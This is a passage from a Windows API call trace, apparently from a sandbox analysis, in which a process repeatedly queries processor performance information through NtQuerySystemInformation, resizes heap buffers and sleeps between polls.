SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0301.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0301.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0301.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0301.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0301.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0301.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0301.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.348] Sleep (dwMilliseconds=0x110) [0301.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0301.360] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0301.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0301.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0301.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0301.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0301.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0301.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0301.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.364] Sleep (dwMilliseconds=0x110) [0301.372] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0301.372] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0301.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0301.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.373] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0301.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0301.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0301.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0301.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0301.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.376] Sleep (dwMilliseconds=0x110) [0301.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0301.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.407] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0301.407] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0301.407] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.408] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0301.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0301.408] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0301.409] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0301.409] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.410] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0301.414] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.414] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.414] Sleep (dwMilliseconds=0x110) [0301.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0301.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.420] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0301.420] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0301.420] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.421] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0301.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0301.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0301.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0301.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0301.426] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.426] Sleep (dwMilliseconds=0x110) [0301.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0301.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0301.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0301.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0301.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0301.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0301.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.441] Sleep (dwMilliseconds=0x110) [0301.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0301.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.455] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0301.455] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0301.455] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0301.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0301.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.456] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0301.456] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0301.456] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0301.457] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.457] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.457] Sleep (dwMilliseconds=0x110) [0301.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0301.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.466] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0301.466] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0301.466] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0301.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0301.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.467] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0301.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0301.467] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0301.468] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.468] Sleep (dwMilliseconds=0x110) [0301.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0301.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0301.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0301.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0301.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0301.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0301.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0301.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0301.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.487] Sleep (dwMilliseconds=0x110) [0301.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0301.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0301.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0301.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0301.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0301.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0301.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.504] Sleep (dwMilliseconds=0x110) [0301.513] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0301.513] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0301.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0301.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.514] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0301.514] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0301.514] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0301.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0301.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.515] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0301.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.516] Sleep (dwMilliseconds=0x110) [0301.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0301.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0301.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0301.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0301.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0301.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0301.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.538] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.538] Sleep (dwMilliseconds=0x110) [0301.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0301.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0301.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0301.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0301.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0301.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0301.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0301.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0301.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.551] Sleep (dwMilliseconds=0x110) [0301.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0301.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0301.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0301.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0301.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0301.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0301.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0301.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0301.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 